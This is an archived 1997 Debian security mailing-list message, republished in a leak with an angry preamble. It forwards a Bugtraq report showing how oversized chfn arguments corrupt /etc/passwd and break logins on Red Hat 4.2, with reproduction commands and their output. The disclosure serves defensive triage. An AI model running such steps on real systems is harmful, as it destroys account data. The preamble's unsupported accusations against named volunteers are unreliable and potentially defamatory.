The debian-private mailing list leak, part 1. Volunteers have complained about Blackmail. Lynchings. Character assassination. Defamation. Cyberbullying. Volunteers who gave many years of their lives are picked out at random for cruel social experiments. The former DPL's girlfriend Molly de Blanc is given volunteers to experiment on for her crazy talks. These volunteers never consented to be used like lab rats. We don't either. debian-private can no longer be a safe space for the cabal. Let these monsters have nowhere to hide. Volunteers are not disposable. We stand with the victims.

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[alex@NET-CONNECT.NET: Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux 4.2)]

To: security@debian.org
Subject: [alex@NET-CONNECT.NET: Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux 4.2)]
From: Wichert Akkerman <wichert@wi.leidenuniv.nl>
Date: Fri, 19 Dec 1997 17:47:54 +0100
Delivered-to: security@debian.org
Organization: Leiden University, Dept. of Mathematics & Computer Science, The Netherlands
Resent-cc: recipient list not shown: ;
Resent-date: 19 Dec 1997 16:44:39 -0000
Resent-from: debian-private@lists.debian.org
Resent-message-id: <"yHVRnB.A.XoB.2Rqm0"@debian>
Resent-sender: debian-private-request@lists.debian.org

I just received this one. It looks like there is a buffer overrun
in the shadow suite.

I tested this on my hamm system and did not find the error. I dod
get a strange error message though:

	$ chfn -f $BUFF -p $BUFF -h $BUFF -o $BUFF
	chfn: Permission denied.

I guess there is a length-check somewhere that protects us.
If someone could test a stable/bo system, please do so and report
the results.

Wichert.

-----Forwarded message from Alex Mottram <alex@NET-CONNECT.NET>-----

Date:         Fri, 19 Dec 1997 07:37:49 -0600
Reply-To: Alex Mottram <alex@NET-CONNECT.NET>
From: Alex Mottram <alex@NET-CONNECT.NET>
Subject:      Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux 4.2)
To: BUGTRAQ@NETSPACE.ORG

I don't have the time to look into this much further, but it definitely
looks scarey.  I've tried it on 3 machines, and they all produce the
same results.  For what it's worth, all 3 machines were installed from
the Redhat PowerTools 4.2 CD and have applied all relevant patches
from ftp.redhat.com/pub/updates/4.2/i386/.

Configuration Information
---------------------------------------------
[alex@machine alex]$ cat /etc/redhat-release
release 4.2 (Biltmore)

rpm -qf /usr/bin/chfn
util-linux-2.5-38

rpm -qf /usr/bin/passwd
passwd-0.50-7

rpm -q pam
pam-0.57-4

[alex@machine alex]$ cat /etc/pam.conf
#
#  THIS FILE IS NOW OBSOLETE
#
#  The contents of this file should be replaced by files in the
#  /etc/pam.d/ directory.
#
#

[alex@machine alex]$ ls /etc/pam.d/
chfn    ftp     login   passwd  rlogin  samba   xdm
chsh    imap    other   rexec   rsh     su

[alex@machine alex]$ cat /etc/pam.d/chfn
#%PAM-1.0
auth       required     /lib/security/pam_pwdb.so shadow nullok
account    required     /lib/security/pam_pwdb.so
password   required     /lib/security/pam_cracklib.so
password   required     /lib/security/pam_pwdb.so shadow nullok
use_authtok
session    required     /lib/security/pam_pwdb.so

[alex@machine alex]$ cat /etc/pam.d/passwd
#%PAM-1.0
auth       required     /lib/security/pam_pwdb.so shadow nullok
account    required     /lib/security/pam_pwdb.so
password   required     /lib/security/pam_cracklib.so
password   required     /lib/security/pam_pwdb.so use_authtok nullok

[alex@machine /tmp]$ tail /etc/passwd
alex:x:500:500:alex,,,,:/home/alex:/bin/bash
zane:x:501:501:zane,,,,:/home/zane:/bin/bash
someone:x:502:502::/home/someone:/bin/bash

[alex@machine /tmp]$ cat pass
#this test has 11719 bytes of the sequence "0123456789", Xs work just as
well.
export -p BUFF='[many Xs, 10k is more than plenty, 2k should work]'
/bin/bash

[alex@machine /tmp]$ ./pass
[alex@machine /tmp]$ chfn -f $BUFF -p $BUFF -h $BUFF -o $BUFF
Changing finger information for alex.
Password:
Finger information changed.
[alex@machine /tmp]$ wc /etc/passwd
     26      29    2068 /etc/passwd

** At this point, the passwd entry for 'alex' is >48k long **

[alex@machine alex]$ passwd
Changing password for alex
(current) UNIX password:
New UNIX password:
Segmentation fault

** LOGIN AS SECOND USER **
[zane@machine zane]$ passwd
Changing password for zane
(current) UNIX password:
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully

** 'passwd' just snipped our one big line into nice 8k chunks
** and created some junk passwd file entries.

[zane@machine zane]$ wc /etc/passwd
     31      34   47829 /etc/passwd

[zane@machine zane]$ su someuser
su: user someuser does not exist
[zane@machine zane]$ su alex
su: user alex does not exist
[zane@machine zane]$ su zane
su: user zane does not exist

Other services I checked were equally screwed.  (ftp, pop-3, etc...)

-----End of forwarded message-----

Attachment: pgp9aDIcFz19W.pgp
Description: PGP signature

Follow-Ups:
- Re: [alex@NET-CONNECT.NET: Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux 4.2)]
  - From: jdassen@wi.leidenuniv.nl

Prev by Date: Re: Away for Christmas; will be at RSA show in SF in January
Next by Date: Re: [alex@NET-CONNECT.NET: Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux 4.2)]
Previous by thread: Re: Away for Christmas; will be at RSA show in SF in January
Next by thread: Re: [alex@NET-CONNECT.NET: Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux 4.2)]
Index(es):
- Date
- Thread